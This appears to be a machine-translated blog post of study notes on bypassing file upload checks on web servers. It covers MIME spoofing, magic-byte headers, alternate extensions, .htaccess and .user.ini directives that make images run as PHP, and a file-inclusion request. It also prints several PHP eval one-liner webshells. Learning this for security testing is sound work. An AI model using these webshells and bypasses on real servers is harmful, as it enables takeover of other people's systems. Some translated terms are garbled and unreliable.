当前位置:网站首页>File upload vulnerability summary
File upload vulnerability summary
2022-07-07 04:50:00 【-*Xiao Kai】
Catalog
File upload vulnerability summary
Front end validation ( client javascript verification )
Back-end verification ( Server side validation )
Server side MIME Type validation ( File content type detection )
Server side file content verification - The file header
Server side file extension verification
notes : Chicken notes , Reference as appropriate !
principle
During development, the files uploaded by users were not strictly detected , Filter , As a result, users can upload executable script files ( Malicious files ), As a result, the server commands can be executed
harm
Get control of the server
You can upload a file with the same file name to overwrite the original file
Vulnerable to directory traversal ;
Denial of service (DoS) attack ....
webshell( Web Trojan file )
The most common method of file upload vulnerability is to upload website Trojan horse (webshell) file ,WEBSHELL Also known as web Trojan file , According to different development languages, it can be divided into ASP Trojan horse 、PHP Trojan horse 、JSP Trojans, etc , This kind of Trojan horse uses the system command execution in the scripting language 、 Functions such as file reading and writing , Once uploaded to the server, it is parsed by the script engine , The attacker can control the server .
webshell Divided into Malaysia , The pony ( In a word, Trojans ) And pictures of horses
Malaysia
The functions are quite complete , But the amount of code is large , Relatively complex , Not easy to hide , Generally, encryption and other means are needed to hide
The pony
Simple function , Less code , Strong concealment
Picture horse
The website only allows uploading pictures (.png .jpg .gif) , And cannot be bypassed , Use pictures of horses
Make pictures of horses :cmd Enter command in :copy picture .jpg/b+ Trojan horse .php/a picture .jpg
Catalog
Front end validation ( client javascript verification )
Back-end verification ( Server side validation )
Server side MIME Type validation ( File content type detection )
Server side file content verification - The file header
Server side file extension verification
Front end validation ( client javascript verification )
Mainly detect the file suffix , Roughly divided into :
The blacklist : Uploaded files are not allowed
White list : Files allowed to be uploaded
When the front end has restrictions on uploading files, you can directly modify the code
eg: lay-data="{url: 'upload.php', accept: 'images',exts:'png'} Change it to :lay-data="{url: 'upload.php', accept: 'file'}
Front end validation bypasses
Turn off in browser settings Javascript
bp Grab the bag to modify ( For example, upload first 1.jpg file , Then grab the bag and change it to 1.php
Back-end verification ( Server side validation )
Server side MIME Type validation ( File content type detection )
MIME The type is to describe the message Internet standards for content types
Mainly for Content-Type:
When there are restrictions on the contents of the file , Can be Content-Type:application/octet-stream And so on :
Content-Type:image/jpeg
Content-Type:image/png
Content-Type:image/gif
Server side file content verification - The file header
The backend will detect the content of the uploaded file
The image format checks the file content by checking the binary at the beginning of the file , Different picture types , File headers are different .
Bypass method :
One , Add a file magic header before the file , Cheat on image content
Common file magic head :GIF89a
JPG: FF D8 FF EO 00 10 4A 46 49 46.
GIF:47 49 46 3839 61(GIF89a).
PNG:89 50 4E 47
Two , Use the server to parse the Trojan file into a picture file , Therefore, when sending a request to execute the file , The server will only return this “ picture ” file , The corresponding command will not be executed .
Therefore, exploit File Inclusion Vulnerability , You can treat a file in picture format as PHP File to parse and execute
.php?filename=uploads/1.jpg&pass=system('cat /flag')
Server side file extension verification
.php?filename=uploads/1.jpg&pass=system('cat /flag')
The extension of the file is filtered by the back end , The uploaded file suffixes are filtered
Bypass method :
Suffix case
Synonymous suffix replacement
php: php、 phtml、php3、php4、php5 jsp: jap、jspx、jspf asp: asa、cer、aspx ext: exee
Double writing bypasses :php -> phphpp
Commonly used
.htaccess
Reference resources : Link to the original text : Delve into user utilization .htaccess Security problems caused by tampering with configuration _ Hetian Wangan College -CSDN Blog
.htaccess file ( perhaps " Distributed profile "), The full name is Hypertext Access( Hypertext entry ). Provides a way to change the configuration for the directory , namely , Place a file containing one or more instructions in a specific document directory , To apply to this directory and all its subdirectories . As the user , The commands available are limited . Administrators can use the Apache Of ''AllowOverride'' Command to set . Here is a brief introduction ,.htaccess To put it bluntly apache A profile in the server ; It is only responsible for the configuration of web pages under relevant directories ;
htaccess The function of documents :
Webpage 301 Redirect
Customize 404 Error page
Change the file extension
Prohibit directory lists, etc
So you can use write .htacess The contents of the document :
<FilesMatch "s1mple"> // Make the name s1mple File as php Format parsing
Sethandler application/x-httpd-php
</Filesmatch >
perhaps :
AddType application/x-httpd-php .jpg // take jpg The document serves as php Format parsing
.user.ini
Reference resources : File upload .htaccess and .user.ini_m0_46587008 The blog of -CSDN Blog
.user.ini. It is better than .htaccess More widely used , Whether it's nginx/apache/IIS, As long as it is with fastcgi Running php You can use this method .
.user.ini The function of documents : You can change the permissions of users to read files and include files , It's more widely used , But one more condition ( More important ) There are executable files in the corresponding directory . Next, let's look at how to construct these two configuration files .
auto_prepend_file=a.jpg // Pass in front of the Trojan horse auto_append_file=a.jpg // Pass in after the Trojan horse
A common sentence is written
<?php @eval($_POST["pass"]);?>
<script language='php'>assert($_REQUEST['pass'])</script>
<script language="php">eval($_POST['pass'])</script>
<scriptlanguage="php">eval($_REQUEST['pass'])</script>
边栏推荐
- C语言中函数指针与指针函数
- How does vscade use the built-in browser?
- Kivy tutorial of setting the size and background of the form (tutorial includes source code)
- 为什么很多人对技术债务产生误解
- JS variable
- What work items do programmers hate most in their daily work?
- Structure actual training camp | after class homework | module 6
- Master the secrets of software security testing methods, and pinch the security test report with your hands
- Jetson nano配置pytorch深度学习环境//待完善
- Have you got the same "artifact" of cross architecture development praised by various industry leaders?
猜你喜欢
C语言中函数指针与指针函数
九章云极DataCanvas公司获评36氪「最受投资人关注的硬核科技企业」
Break the memory wall with CPU scheme? Learn from PayPal to expand the capacity of aoteng, and the volume of missed fraud transactions can be reduced to 1/30
Vscode 如何使用内置浏览器?
Tree map: tree view - draw covid-19 array diagram
How to open win11 remote desktop connection? Five methods of win11 Remote Desktop Connection
Flex layout and usage
JS also exports Excel
九章云极DataCanvas公司蝉联中国机器学习平台市场TOP 3
Meow, come, come: do you really know if, if else
随机推荐
JS variable case
Leetcode notes
Introduction to namespace Basics
A detailed explanation of head pose estimation [collect good articles]
Flex layout and usage
Fiance donated 500million dollars to female PI, so that she didn't need to apply for projects, recruited 150 scientists, and did scientific research at ease!
过气光刻机也不能卖给中国!美国无理施压荷兰ASML,国产芯片再遭打压
This "advanced" technology design 15 years ago makes CPU shine in AI reasoning
程序员上班摸鱼,这么玩才高端!
Meaning of 'n:m' and '1:n' in database design
How to conduct website testing of software testing? Test strategy let's go!
JS also exports Excel
Some understandings about 01 backpacker
Jetson nano configures pytorch deep learning environment / / to be improved
浙江大学周亚金:“又破又立”的顶尖安全学者,好奇心驱动的行动派
sscanf,sscanf_s及其相关使用方法「建议收藏」
Wechat can play the trumpet. Pinduoduo was found guilty of infringement. The shipment of byte VR equipment ranks second in the world. Today, more big news is here
R语言主成分pca、因子分析、聚类对地区经济研究分析重庆市经济指标
What is JVM? What are the purposes of JVM tuning?
A row of code r shows the table of Cox regression model